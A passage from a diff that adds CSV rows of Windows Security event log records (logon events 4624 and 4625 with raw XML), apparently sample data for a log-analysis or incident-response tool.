+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:25.097874Z"">
+    </TimeCreated>
+    <EventRecordID>2988550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x568d99</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64229</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.920903Z"">
+    </TimeCreated>
+    <EventRecordID>2988547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56874b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64227</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.906195Z"">
+    </TimeCreated>
+    <EventRecordID>2988544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x5686d9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64226</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.521162Z"">
+    </TimeCreated>
+    <EventRecordID>2988535</EventRecordID>
+    <Correlation>
